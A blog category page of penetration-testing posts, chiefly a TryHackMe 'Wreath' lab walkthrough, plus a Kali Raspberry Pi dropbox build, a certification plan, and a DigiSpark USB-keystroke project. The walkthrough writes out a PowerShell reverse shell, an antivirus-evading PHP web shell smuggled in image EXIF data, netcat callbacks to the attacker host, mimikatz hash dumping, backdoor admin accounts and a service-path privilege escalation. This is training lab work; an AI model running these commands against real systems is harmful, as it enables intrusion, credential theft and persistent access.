Category: Hacking

Categories
Coding Computers Hacking Linux Networks Servers

TryHackMe – Wreath Network

So over the past couple of weeks, I decided to go through the TryHackMe room: Wreath. This room is designed to better understand an entire Pen Testing engagement with a potential customer.

This room is really good at going through some very key points that I haven’t found anywhere else (yet) on the TryHackMe website. The room specifically looks at, Pivoting, Anti Virus Evasion and Comand and Control system. All three of these are brilliant topics to get your head into and TryHackMe does a great job of providing enough information without overloading you.

The first point of the room is to give you a brief of the engagement which has the following key points:

https://tryhackme.com/room/wreath

There are three machines on the network
There is at least one public-facing webserver
There is a self-hosted git server somewhere on the network
The git server is internal, so Thomas may have pushed sensitive information into it
There is a PC running on the network that has an antivirus installed, meaning we can hazard a guess that this is likely to be Windows
By the sounds of it, this is likely to be the server variant of Windows, which might work in our favour
The (assumed) Windows PC cannot be accessed directly from the webserver

The Web Server

So the first thing to do is begin with some enumeration of the network. The subnet changes each time the network is reset, so you may need to be careful if you take more than a day or two on the entire room. Enumerating the network using Nmap to identify what devices are available. The lowercase x below is because you should configure this to be whatever TryHackMe tells you at the moment it is .90.X:

nmap -Pn 10.200.x.X/24

Once initial scanning is done and you’ve identified the webserver (it should be the only server available) then you can perform a more in-depth Nmap scan:

nmap -sS -sC -sV -O -A 10.200.X.X

This will return a few services available on the web server. One of these services has a critical CVE from 2019. A quick search using searchspolit on Kali of ExploitDB online will provide you with the exploit’s Proof Of Concept (POC). Use this python exploit to gain access to the system. It is advisable to read the code to better understand what the exploit is and how it can be leveraged. This exploit is particularly bad as the service runs as Administrator/Root so once we’ve used the exploit we will get a shell as root.

OK, so now we effectively own that machine we need to stabilise our access. The best way to do this is to see if we can find SSH keys for our root user which we can then use to remote in moving forward.

GitServer

So now that we have access to the web server we need to get access to the next server in the network. To do this you want to follow the five steps outlined in the room:

https://tryhackme.com/room/wreath

Using material found on the machine. The hosts file or ARP cache, for example
Using pre-installed tools
Using statically compiled tools
Using scripting techniques
Using local tools through a proxy

It is worth reading all the room has to offer on different tools for Pivoting, there are some amazing tools available. I personally really like socat but have used ProxyChains before too.

As per the recommendation, we can use statically compiled tools to run on the Web Server to gather additional information about our next target. To do this you can download a static variant of Nmap from here:

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true

The upload it to the webserver you compromised. There are a variety of ways you can do this, either using cURL or SCP as we have SSH access. Once uploaded we can use our copy of Nmap to scan the network again and find whatever IP address is available. As we may be able to identify some devices which are Windows we should assume all devices are up without allowing ICMP/Ping. Windows blocks this by default:

./nmap -sn 10.200.X.X-X -oN scan-Username

There are two devices that we can now see on the network, one which has some open ports and another which is filtered, so we know the other exists but we’re blocked from accessing it. Based on the brief we must assume that the filtered device is the Personal Computer with the Anti-Virus installed on it. Let’s park that one for now and concentrate on the Git Server. We’ve found a few ports open and an application which has a vulnerability.

Now to get access to the system we need to pivot through the web server we’ve already compromised. I personally tried to get this to work with Socat but struggled mainly because I wasn’t experienced with Firewall changes in CentOS. Follow the guides of TryHackMe and use the shuttle it’s really easy to use and takes one line to get a pivoted connection:

sshuttle -r root@10.200.90.200 --ssh-cmd "ssh -i id_rsa" 10.200.90.0/24

Now we can start investigating the open ports we found. There’s a particular web application available on this server that again has a particularly bad vulnerability. We can run this python2 script to create a backdoor on the GitStack server which we can then use to run commands on the server to gather further information.

Socat Listener/CentOS Firewall

We now need to set up a Socat listener between the Web Server and our Kali attacking machine to allow the connection from the GitServer back through to our Kali machine for a reverse shell. The first thing here is the create a Firewall rule to allow the Socat connections through:

firewall-cmd --zone=public --add-port 16000/tcp

Now that we have a port open we can upload Socat to the Web Server, again using cURL or SCP and create the connection back to the Kali server:

./socat tcp-l:16000 tcp:10.50.91.232:443 &

Now if we open a netcat listener on our Kali machine on port 443 we can run the Powershell script in the next section to get a shell.

Powershell/Reverse Shell

The main thing is here we can use the backdoor to create a reverse shell using Powershell and encoding the command for URL https://www.urlencoder.org/:

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

This should give us a pseudo shell once we replaced the ‘IP’ and PORT part of the command above with the IP of the Web Server and the port you opened up.

Stabalisation & Post Exploitation

Now that we have a connection onto the GitServer we need to ensure that we can get connected again should we lose connectivity through this PowerShell reverse shell. To do this, because we are SYSTEM we have full administrator rights. Let’s create a new user and grant them full admin rights:

net user <username> <password> /add
net localgroup Administrators <username> /add
net localgroup "Remote Management Users" <username> /add

This now gives us a user that we can use to log into the machine as a local admin. The ports that we found when performing our Enumeration work gives us some options available to us. One is RDP and the other is WinRM.

The room takes you through installing freerdp2-x11 which is a really useful utility as you can add shares from your local machine (Kali) so gaining access to tools such as mimikatz becomes as simple as one command:

xfreerdp /v:10.200.90.150 /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

In this command, we’re logging into the server and creating a SMB share called “share” which routes back to /usr/share/windows-resources. We can then load any of our exploits/resources in that folder directly into memory through the share.

We can now run mimikatz to capture hash files of all of the users now we’re logged in as an administrator. Load mimikatz and run the following commands:

privilege::debug
token::elevate
lsadump::sam

We can now store the NTLM hashes to try and crack them and if we cannot we can still use them later on. To create an alternative form of access we have WinRM at our disposal and now we have the NTLM hashes we can use them. Install evil-winrm:

apt get install evil-winrm

Now we can remote into the server using evil-winrm with our administrator hash:

evil-winrm -u Administrator -H <AdministratorHash> -i 10.200.90.150

Command and Control

Now this section is awesome not only because the introduced software is very well written and works amazingly, but whoever wrote it decided to name it Empire and the GUI Starkiller. For anyone who loves Star Wars like me, this is amazing.

The way this system works is there is a command server, usually your Kali machine or if you’re doing this for a career a Linux machine somewhere in the cloud. This command server has a listener or number of listeners on it, waiting for connections from your agents. These listeners come in various options but the most used ones are HTTP and HTTP-Hop mainly because they can blend into normal day-to-day traffic easier.

The next part is the stager, this is a script/command that creates our agent. This comes in a number of forms but Bash and Powershell are the ones introduced in the Wreath room. Once these stagers are run on your compromised machine they will create an agent connection back to your control server. Once connected you will be able to run commands as if you were on the agent through the command server.

I mentioned in the part about listeners about HTTP-Hop, this is a special listener because it allows you to set up a hop station should you be pivoting around a network. What this essentially does is allows us to take an entry point in the network and make use of it as a “jump” server between our command server and a compromised device that doesn’t have internet connectivity for example:

Command Server <—–> Web Server <—-> Compromised Machine

Take the points above, the compromised machine doesn’t have connectivity to the internet however, it does have connectivity to the web server and the web server has connectivity to the internet. In this case, we have a listener set up to communicate from the Web Server back to our Command Server, what we can do is create an HTTP-Hop listener and install it on the Web Server which will redirect the traffic from the Hop to the original listener installed. Then on the compromised machine, we tell the stager to connect to the Hop listener and hey presto connectivity from the command server through the web server to the compromised machine.

Personal Computer

OK, so we now have full control over both the Web Server and GitServer as well as a couple of ways to access both. From here the next step was to start enumerating the final device in the network. We know from previous enumeration attempts we were being filtered on the Web Server when we tried to connect to this computer .100 but now we have access to the GitServer we can try and run a port scan.

To do this we can upload a Powershell script through Evil-WinRM:

evil-winrm -u Administrator -H <hash> -i 10.200.90.150 -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/

Now using PowerShell we can initialise the script we want called Invoke-Portscan.ps1 from the network folder we added in the previous command:

Invoke-Portscan.ps1

Finally, to enumerate the Personal Computer we can run that script:

Invoke-Portscan -Hosts 172.16.0.10 -TopPorts 50

Further Pivoting

TryHackMe recommends making use of Chisel and their Forward Proxy service. The only real requirement before connecting to the Personal Computer is setting up a firewall rule on the GitServer:

netsh advfirewall firewall add rule name="Chisel-FP" dir=in action=allow protocol=tcp localport=16000

I’ve chosen port 16000 here as the port that we will connect through to get connected to the Personal Computers website. Then we can upload the chisel executable to the GitServer and run it using the port configured before:

.\chisel.exe server -p 16000 --socks5

Now were half way there to having this connection open. We need to connect from our attacking machine (Kali) to this chisel server. We do this by using chisel to connect to the GitServer:

.\chisel client 10.200.90.150:16000 9090:socks

Finally, if we set up a proxy on our browser using something like FoxyProxy to go via port 9090 on a SOCKS5 connection we can then browse the website using: HTTP://127.0.0.1:9090.

Git Goodness

By now we’ve taken a look at the site hosted on the personal computer and identified that it’s a carbon copy of the original site we saw on the web server. Looking at the GitServer however, we can see there is a repository on it in the directory: C:\GitServer\repositories\Website.git. We can download this git file and use a tool to extract its content.

First clone the tool on your attacking machine:

git clone https://github.com/internetwache/GitTools

Next use the extractor.sh file extract all of the contents from the Website.git file to a new folder, I’ve called my DevelopmentServer:

./extractor.sh ./website.git DevelopmentServer

Now we can run a quick bash one liner to identify the latest version of the site:

separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"

This looks at the commit-meta.txt file in each folder extracted in the DevelopmentServer folder and outputs the information. From here we can see there are three main IDs:

  1. 70dde80cc19ec76704567996738894828f4ee895
  2. 82dfc97bec0d7582d485d9031c09abcb5c6b18f2
  3. 345ac8b236064b431fa43f53d91c98c4834ef8f3

If you look closely at the output you can see two of these have parent IDs against them making them not the root commit but a child one. As a result, we can rule out the one without a parent as that was the first upload of the website. Then if we find the ID with the parent ID of the original website we can rule that out as the second update, leaving the third and final commit as the latest edition of the website. In this case, the 3rd ID in the list above is the latest.

From here we can try and find if there’s a vulnerability in the site we can take advantage of. As we know the site uses PHP as before we can search for PHP files in that directory using the find command:

find . -name "\*.php"

The result is a single file called index.php, there are some interesting comments on things that need to be sorted, one of the main ones being that the resources folder is protected by basic auth. Here is where human habits come in, we cracked Thomas’ password in a previous step, let’s see if he is using it here, go to the website HTTP://127.0.0.1:9090/resources and login with Thomas and the password from the NTLM hash taken using mimikatz. Once being the auth we can see that it’s an upload function, however, there are some filters in place which we should have identified in the index.php file:

$size = getimagesize($_FILES["file"]["tmp_name"]);
if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
    header("location: ./?msg=Fail");
    die();
}

This filter checks for the size of the image through EXIF data to ensure that it is an image using the getimagesize function. The final part of the function checks if the file has the correct extension. The second part to bypass is easy as it’s hard coded to explode out the filename using . as the delimiter and only returning the number 1 array item. To get around this we can simply upload a file called image.jpg.php. The explode function takes image as array item 0, jpg as array item 1 and PHP as array item 2.

Exploit

OK, so we know what we’re working with, time to exploit it. To do this we can use exiftool to create a PoC. Download an image and run exiftool to add a PHP comment:

exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" example.jpeg

What we have done here is implement some PHP code in the comment of the EXIF data which just outputs a piece of HTML on the screen. Next we add the PHP extension to the file and upload it through the website:

mv example.jpeg example.jpeg.php

If we now go to the resources uploads folder we should be able to run the file and see if we get the expected output:

HTTP://127.0.0.1:9090/resources/uploads/example.jpeg.php

We do, this is awesome, now we have the ability to run code remotely. Before we can upload a file to run a remote shell we need to review what we were told about this computer: There is a PC running on the network that has an antivirus installed, meaning we can hazard a guess that this is likely to be Windows. OK so we need to run some obfuscation to get past the antivirus. First let’s create the payload:

<?php
    $cmd = $_GET["awesomecommand"];
    if(isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>

Time to obfuscate it, go to the following website and select every option for obfuscation and click Obfuscate Source Code: https://www.gaijin.at/en/tools/php-obfuscator

Now the uploader won’t like you uploading the same filename, this was shown in the PHP source code from the Git repository however, we can run exiftools again to input the new comment with the new obfuscated source code, change the filename with the mv command and upload it. When you go to the new web page you will hopefully be presented with an error of “Undefined Index”, if you do you’ve done it. The reason why is because the exploit code is expecting a URL parameter of awesomecommand so if go to the following web address we should get back the response of the shell command whoami:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=whoami

Brilliant, now we have a foothold, let’s get a full shell. To do this, download a statically compiled version of netcat, you can get one from here:

git clone https://github.com/int0x33/nc.exe/

Next, we can set up an HTTP server (python3 -m http.server 80) on our attacking machine and use cURL to download the nc.exe to a location of our choosing. The room says to use the temp folder within Windows, however, I had trouble with that, a much safer and more guaranteed option is to use the tasks folders as that’s world writable:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=curl http://10.50.91.232/nc.exe -o c:\windows\tasks\nc-USERNAME.exe

The connection should get established and the nc.exe file will be downloaded to the windows\tasks folder. Right almost, there we have the means to get a shell, let’s run it, on our attacker machine setup a netcat listener: nc -lvnp 4444

Now run a PowerShell command to run the newly downloaded netcat executable to connect to our attacking machine:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=powershell.exe c:\windows\temp\nc-USERNAME.exe 10.50.91.232 4444 -e cmd.exe

Mileage may vary here and the port may need to be changed, if you don’t get a connection, use one of the well-known ports, 80, 443 etc.

Privilege Escalation

What a journey, now the final piece get root/administrator on this Personal Computer. The first thing here is to enumerate the system to see what we can exploit to get full rights. Follow the room here as there are some cool commands that can be run to get a better understanding of what’s available. Here I will just use this command which is important:

wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"

This command searches for all non-windows services. One of them has a PathName which isn’t in quotation marks, we then use this command to check if it runs under a local admin account:

sc qc SERVICE_NAME

The final part of the enumeration is to check if we have rights to the folder for and exploit:

powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"

The enumeration is now done, we have a service which hasn’t been quoted and as spaces in it and is run as an admin as well as permission to write in the folder where the service resides. The way this works is because the service isn’t in quotation marks it runs through each word looking for the file in that folder, here is an example pulled from the room:

C:\Directory.exe
C:\Directory One\Directory.exe
C:\Directory One\Directory Two\Executable.exe

So, let’s write some code on our attacker machine to get a new reverse netcat connection but under the service which is the administrator. You can follow the room here as it’s exactly what I did, the end result is you have a wrapper.cs file (c sharp) which we can then compile into an executable:

mcs wrapper.cs

It’s good to follow the room here for getting the new wrapper.exe file onto the Personal Computer as it showcases an alternative method for copying files around, however, for this blog we will just use a simple HTTP server: python3 -m http.server 80

Again like before I uploaded this to the tasks folder using cURL rather than the temp folder. Finally now that we have got it uploaded we need to move the new file into a location before where the service is and restart the service:

copy c:\windows\tasks\wrapper.exe "C:\Program Files (x86)\System Explorer\System.exe" 
sc stop SystemExplorerHelpService 
sc start SystemExplorerHelpService

Before you start the service, set up a netcat listener on the port you specified in your wrapper. The service will not start correctly as it’s loading our file but we do get a reverse shell and we’re on as an administrator. SUCCESS, we’ve done it, got control of the entire network.

Takeaways

There’s been a lot of learning in this room but there have been some topics that have really been beneficial for me.

Pivoting

Whilst I had knowledge of this technique and used it when completing my eJPT exam I didn’t have a great understanding of it and how best to use it. Going through different applications that can be used for this has been great and has given me a better understanding of what to use and when.

Command & Control (Empire & Starkiller)

What to say about this, I’m a huge Star Wars nerd so just the names are truly awesome. However, I built a Command and Control system through the book Black Hat Python (explained here: https://random-it-stuff.com/2022/01/05/cyber-security-red-teaming-path/) and whilst I know it works and my system runs off GitHub as per the book I didn’t appreciate exactly how I could build out my system. Now I’ve had some time with Empire/Starkiller I have gained some new ideas on how to make my system better.

Categories
Coding Computers Hacking Linux Networks

Kali Dropbox

#Please note any links in this article are affiliate links. You will not be charged extra if you use these links however, I will get some kickback if you do so thank you.

As part of performing a Penetration Test, it is often good practice to try and get a device on the internal network, especially if performing a physical test. There are loads of ways of doing this with guides available from YouTube and other blog sites but I thought I would write up how I’ve done it in case, someone comes across this page and is intrigued. This should be pretty straightforward now as I’ve spent quite some time writing custom scripts to create reverse connections and other things to then realise you can just use a VPN connection.

So to the hardware then; here is a kit list of everything that I’ve got:

*Not strictly necessary but it does mean you can connect to a network if it’s PoE capable without the need for a Power supply

First things first, don’t be the idiot that I was and try and install the Pi into the case with the Micro SD card installed. It’ll cost you £10 for a replacement!

So now that we have everything we need, let’s get Kali installed on the SD Card. This is pretty easy as Kali have an ARM variant of their operating system https://www.kali.org/get-kali/#kali-arm. Download the image specific for your device. To get the image onto your SD card there are a few options for imaging software the one I use is called Etcher by Balena: https://www.balena.io/etcher/. It’s really easy to use, however, I did get an error message when adding my Kali ARM image stating it couldn’t be written properly. I ignored it and installed the SD Card in the Pi and the works fine.

Next we need to decide on how we’re going to connect out to our command and control system. As mentioned above, I went off on a complete tangent with this and tried creating my own Python script to be able to connect out and open a reverse connection. In the end this wasn’t necessary at all. As every business has an internet connection and the main use of this is web browsing using an SSL VPN service is almost always going to be open. To make this work Kali has OpenVPN already installed so you just need to set up a service which your Dropbox can connect to. In my case we’ve already set up a VPN service to our office which is available on TCP/443. All I needed to do is download the OpenVPN config file from my VPN server set the connection request to TCP/443 (default is UDP/1194) and connect up.

We’ve now got a device that can connect up to a remote service from anywhere in the world providing we run that script. Let’s get this to run on boot. To do this we need to enable OpenVPN from boot using this command: systemctl enable OpenVPN

This starts the service on boot and by default looks for a config file in /etc/openvpn/openvpn.conf. Moving our config file and renaming it to openvpn.conf in that location will solve this riddle. Now on boot it automatically starts OpenVPN and connects up to our VPN service. This is great the final piece is to have some error checking, should the VPN go down for whatever reason we need something to attempt to re-establish the connection and/or test for any internet connectivity problems. To solve this we will use a Python script and a Cron Job which will run the script every 5 minutes.

import http.client, urllib
import socket
import ipaddress
import os
import time
from netifaces import AF_INET, AF_INET6, AF_LINK, AF_PACKET, AF_BRIDGE
import netifaces as ni

def CheckIPAddress():
   try:
       SocforIP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
       SocforIP.connect(("IP of VPN Network", 80))
       vpnIP = SocforIP.getsockname()[0]
       if ipaddress.ip_address(vpnIP) in ipaddress.ip_network('Subnet of VPN Network'):
          VPNOn = CheckifVPNOperational()
          if VPNOn != None:
             return VPNOn
          return vpnIP
       else:
          return "1.1.1.1"
   except:
       return "1.1.1.1"

def CheckIfAddressDifferent(IpAddress):
    try:
        file = open("StoredIP.txt")
        line = file.readline()
        OriginalIP = line.split(",")[0]
        file.close
        if(OriginalIP != IpAddress):
            with open("StoredIP.txt", 'w') as OpenFile:
                OpenFile.truncate(0)
                OpenFile.write(str(IpAddress) + "," + str(time.time()))
                SendNotification("Tap Interface of the-box has change and is now: " + IpAddress)
    except:
        with open("StoredIP.txt", 'w') as file:
            file.write("new file opened")

def SendNotification(Message):
    PushoverConnection = http.client.HTTPSConnection("api.pushover.net:443")
    PushoverConnection.request("POST", "/1/messages.json",
        urllib.parse.urlencode({
            "token": "xxxxxx22222222",
            "user": "xxxxxxx33333333",
            "message": Message,
            "title": "Dropbox has connected to the VPN"
        }), {"Content-type": "application/x-www-form-urlencoded"})
    response = PushoverConnection.getresponse()

def CheckforInternetConnectivity():
    response = os.system("ping -c 1 8.8.8.8")
    if response == 0:
        os.system("systemctl restart openvpn")
        time.sleep(5)
        ipaddressfound = CheckIPAddress()
        if ipaddressfound == '1.1.1.1':
            True
    else:
        with open("StoredIP.txt", 'w') as file:
            file.truncate(0)
            file.write("There is no internet connectivity," + str(time.time()))

def CheckifVPNOperational():
    response = os.system("ifconfig tun0")
    try:
       if "Device not found" in response:
         os.system("systemctl restart openvpn")
    except Exception as e:
         tun0ip = ni.ifaddresses('tun0')[AF_INET][0]['addr']
         return tun0ip

if __name__ == '__main__':
    ipaddressfound = CheckIPAddress()
    if ipaddressfound != '1.1.1.1':
        CheckIfAddressDifferent(ipaddressfound)
    else:
        CheckforInternetConnectivity()

Finally to run a Cron Job every five minutes you need to set the timings as follows: */5 * * * python3 notification.py

Categories
Hacking

Cyber Security/Red Teaming Path

Caveat: I know this isn’t our usual posts where we show some random thing we’ve had to do to make something work. However, I’ve been struggling to find a solid path of how to progress in the following part of the Cyber Security industry so I thought I would post it on here so others could see what I’m planning on doing. I will provide an update later on in the year with how I’m getting on and what I’ve found needs additional research/training.

As discussed in one of my previous posts I’ve been getting into Cyber Security again specifically Red Teaming/Penetration Testing. I’ve spent the past few months trying to figure out how to go about expanding my knowledge and enjoying what I’ve been doing.

I’ve struggled over the past month or so to try and figure out what way I want to go with this and how I go about getting there. I’ve read people mention that OSCP by Offensive Security: https://www.offensive-security.com/pwk-oscp/ is a good certification to get however, my research suggests that it’s quite complex and requires a lot of knowledge which I don’t have. Further to this, it seems like a significant leap from where I am now and where I have to be to become certified with no real way of realising how far or close you are without taking the exam.

So here is a bit about me and what path I plan to follow in 2022 to hopefully get to the level where I can pass OSCP.

My Background

So, a little bit about me in case anyone stumbles across this and wants to understand what I’ve learned and where I am planning on taking the next steps.

I graduated in 2012 with a Computer, Networks & Security degree. This degree primarily focused on Cisco’s CCNP certification at the time which included Switching, Routing, Network Security (VPNs and some Firewalling) and Network Optimisation (Quality of Service). Whilst going through this degree I did get the opportunity to expand on some of the security aspects so I elected to take Biometrics, as well as Computer System Security which focused on Encryption and another module that focused on Anti Virus. Both of these last two modules ended up having coding assignments which from memory I wrote in Java.

After that, I spent a couple of years working with a consultancy firm gaining experience and focusing on Network Security gaining my CCNP Security in the process. At this point, I was pretty proficient in a lot of the networking technologies having my CCNP Routing & Switching as well as the Security track. Then it all stopped. I ended up moving jobs due to personal reasons and moving into an infrastructure based role doing all sorts of other things becoming more of a generalist rather than focused on a specific path. However, I was granted the opportunity to get my Certified Ethical Hacker (CEH) from EC-Council back in 2015 which I passed but never used again.

So this pretty much brings me up to 2021 where I discovered the Darknet Diaries podcast which I mentioned in a previous post. Since catching up with this podcast I have undertaken the following training/expierence.

As you can see I haven’t done too much since deciding to go down this path and my previous experience as a consultant has all but illuded me now with it being over 7 years ago that I was doing it. Nor have I spent too much money.

The Path

So now to the path I have chosen. First of all, I am going to take the certification eJPT which is e-Learn Junior Pen Tester: https://elearnsecurity.com/product/ejpt-certification/. This should be a nice starter into the field and as I have a lot of experience in my day job at networking so I’m hoping that taking this exam will allow me to pass it to keep my motivation up whilst allowing me to see where I need to improve. This one costs $200 and the training is free through INE.

Then once I have passed that, I am going to move on with the following objectives:

  • Read the books I purchased above.
  • Complete more of the Try Hack Me rooms
  • Sign up to and complete some of the Hack the Box rooms. Will need to check what costs are involved with this.

Once confident in my abilities I am going to attempt the following qualification from e-Learn: https://elearnsecurity.com/product/ecpptv2-certification/. This certification costs $400 plus if you want access to any of the training material you have to sign up for a paid version of INE, which is $49/Month. This from what I can see is a good stepping stone towards the OSCP which is my goal.

Hopefully, at this point and passing both of these, I will be more confident to have an attempt at OSCP.

For further information on how I came up with this plan please look at this security certification roadmap that I found which from what I can see is pretty current at the time of writing – Jan 2022: https://pauljerimy.com/security-certification-roadmap/

Update – 14/01/2022

So today I took my eJPT lab exam. The exam itself was really good with 20 multi-choice questions which you could answer depending on how far you got and how much you managed to compromise. You get 3 full days to access the lab and go through the pen test and need to get 75% correct. I started at 8:30am, went through all 20 questions and downloaded the engagement pack.

You get a VPN file that drops you onto a network for you to begin your work. Within 3 hours I had compromised everything on one network and had pivoted to another, by this point I had answered 19 questions and three of those I couldn’t be 100% sure on. At that point, I was fairly sure I had already passed as I was very confident or completely sure on 16 answers but wanted more.

I spent another three hours trying to compromise another server to no avail. I went through everything I could think of and because it’s open book even researched different exploits/techniques I could use to try and get access. After spending this time work got in the way and I needed to get back to the day job so I guessed on the final question I didn’t have an answer for and clicked submit. I passed with 85% which is great. You get your result instantly.

Whilst I’m glad I passed and got to experience this lab and felt that the lab was a fantastic environment to implement and test my skills, I am annoyed. I’m annoyed because I couldn’t compromise the last piece in this puzzle and get the answers to all of the questions. Unfortunately, you do not get any feedback from the exam which I wish eLearnSecurity would provide that was I could be confident on what I need to brush upon. I feel I have a good idea of what I need to refresh but some clarification would have been nice.

Anyway onto the next one: eCPPTv2.

Update – 05/07/2022

So it’s been about six months since I last posted on here. Unfortunately, life has got in the way and as a result, I’m not much further along this path. I have been busy though. In the time since my last update, I’ve been working on a couple of personal DIY projects which has been fun, probably a write-up for another post.

Regarding the Cyber training and experience. I’ve been reading the Serious Cryptography book linked above which has been highly technical and also highly mathematical. I’ve also managed to finish the Black Hat Python book which was way more fun for me and with the experience gained, I’ve managed to create a port scanner using Python which does both TCP and UDP which seems to be non-existent. I’ve also created a Command & Control system but at the moment it’s very basic and any further development has been put on the back foot. I’ve also been developing an RFID scanner/cloner which makes use of an Arduino Uno which is mostly there and I’ve even created a 3D printed case for it, so I’ve been learning to 3D model as well. As you can see it’s been a bit haphazard since my last update.

One final thing I’ve been up to is TryHackMe, I’ve spent a considerable amount of hours going through some of the rooms learning different techniques and tactics. It’s been very enjoyable going through these rooms, so much that at the beginning of April three months ago I became ranked in the top 1% of the platform. I wasn’t quite sure how I managed it to be honest, but since then my rank has only got higher, so high I’m around the top 6000 mark which is incredible considering I’ve not really been trying.

Now that some of my personal projects are of out the way I’m hoping to spend some money on the PTP course from INE which should prepare me for the CPPTv2. I’ll try and update this more often.

Categories
Coding Hacking Linux

Stupidity at its best.

So I’ve been in the IT industry for over ten years working with a variety of organisations doing all sorts of cool things. Thoughout my career I have done a variety of stupid things and as I got older I was convinced that these stupid mistakes would become less or would become so obscure that they wouldn’t be considered stupid. This obviously isn’t the case based on the title of this blog post.

About a month ago, I got an email from EC-Council’s training platform: Codered, due to my Certified Ethical Hacker (CEH) certification expiring. Offering a bunch of courses all for $1. Now I know what you’re thinking here, this is a phishing scam but I went directly to the website signed in and it was true. I signed up for Wireshark for Hackers and Black Hat Python. The Wireshark course was for beginners which needless to say it very much was. I picked up a few things but what annoyed me the most was watching the trainer figure out what he was trying to teach on video, not cool. The Python course though was cool, the educator was brilliant. Super detailed but put it all in a way that was really easy to understand. This was also helped by the fact that I’ve done some Python work before so the syntax was familiar.

Now the backstory is done, onto the stupidity part. Within the Python course, there was a module specifically dedicated to Brute Force cracking Linux/Unix passwords from the /etc/shadow or /etc/passwd file. This used the module crypt. I build the script and had it all ready but with me being on a Windows machine it wouldn’t work with a sample shadow/passwd file available on the internet. So after a little bit of time, I built a Linux VM for something else, copied the file across and tried it out.

Fail. The code wouldn’t run and just threw the following error:

AttributeError: ‘module’ object has no attribute ‘crpyt’

So to everyone’s favourite troubleshooter, Google. I put the error into Google and nothing. This is very unusual, I almost always find someone with an error pretty much matching what I have. I’m not a programmer after all. I found a bunch of people with the same error but not against the same attribute. I spent hours, researching into this trying to find if there was a Pip module that I hadn’t installed. For those of you that are unsure Pip is a program to install Python modules onto a system. Everything suggested that I needed to install the cryptography module on Linux but when I tried that it said it was already installed. So I thought maybe it was the distribution of Linux that I was using, Kali. The trainer used Ubuntu so I moved over to one of my servers with Ubuntu on to try that. No dice.

Finally, I decided to give up on searching and went to the line of code in question which was throwing the error:

digest = crypt.crpyt(word, hashed_pass)

I use Visual Studio Code (VSCode) for my programming and the nice thing is in Python on VSCode each piece of code is usually colour coded, so green for a module, yellow for a function, light blue for variable and orange for some text, etc. This was when I realised the word crpyt after crypt. was white. Oh, balls, it’s a typo, changed it to crypt, the word went yellow, re-copied it to my Kali machine and hey presto everything is working.

For all of you out there that are either just starting out or have been in the field for a short while and end up making a mistake like this. Don’t worry, someone who’s got a job as a Senior Engineer makes these mistakes too and I don’t doubt that I won’t stop making these mistakes until I retire. Don’t get disheartened by it, it’s human nature and I hope this post helps you in realising that. For those of you that run into this issue yourself whilst messing about with Python, check your code and make sure you haven’t made a typo as that error can be quite misleading if you don’t read it letter by letter like me.

Categories
Hacking

Poor mans Rubber Ducky in the UK

This is a long one!

So a month or so ago I went to an event titled “Cyber Security Masterclass” which was the first event I’ve been to since the whole COVID-19 lockdown thing. The event itself was OK, unfortunately, they aimed it at low-level technical engineers and decision-makers which made it difficult for myself and my boss who are quite technical. Whilst there the Security Analyst told me about a podcast called Darknet Diaries: https://darknetdiaries.com/ which I started listening to. Turns out I hit this podcast pretty hard listening to over 60 hours of episodes in a month… Whoops.

The other thing that the Security Analyst showed us was the good old Rubber Ducky which is a USB device that emulates a keyboard that you can put scripts onto. This is something I’d seen before but never really delved into.

After the event, I got an idea to try and use one of these devices at work. Got approval from my boss so I started looking into it further. I found the company that made the Rubber Ducky (https://hak5.org/products/usb-rubber-ducky-deluxe) and whilst they looked good I couldn’t justify £80 for a single device knowing that I was going to drop three of them off at different locations. Time to start looking at cheaper alternatives. Very quickly I stumbled across an Arduino board that does this sort of thing, the DigiSpark ATTINY85: https://www.amazon.co.uk/Reland-Sun-Digispark-Kickstarter-Development/dp/B08RRLRMYM/ref=sr_1_5?keywords=attiny85&qid=1636622041&s=computers&sr=1-5

These boards come in a variety of options from a development board to one that looks like a normal USB drive. As a PoC I went for the development board.

From here I followed this guide to get my computer set up and ready for coding up the board: https://maker.pro/arduino/projects/how-to-build-a-rubber-ducky-usb-with-arduino-using-a-digispark-module. Whilst this worked fine and got me up and running, I was running into issues with some of the special characters on the keyboard. After a bit of research, it appeared that the package I downloaded only supported US keyboard layouts 🤦. A lot of the research suggested modifying the scancode-ascii-table.h file to replace some of the special characters with ASCII characters that I needed. This seemed like a complete ballache for something that I’m surprised wasn’t baked into the solution from the get-go. However, after some more digging, I found another GitHub repo that had a Multi-Keyboard Layout option: https://github.com/rsrdesarrollo/DigistumpArduino. Going through this and re-adding the software through Board Manager in Arduino got me exactly what I needed.

So, so far so good, we have a USB chip that supports UK keyboard layouts and we’ve set up our computer to be able to write some code to the ATTINY85. So what’s left to do:

  1. Figure out a script to use which allows us to see which individuals have plugged in the USB.
  2. Sort out some casing for the USB device to make it a bit more realistic.
  3. Work out a plan to drop the USBs off at site.

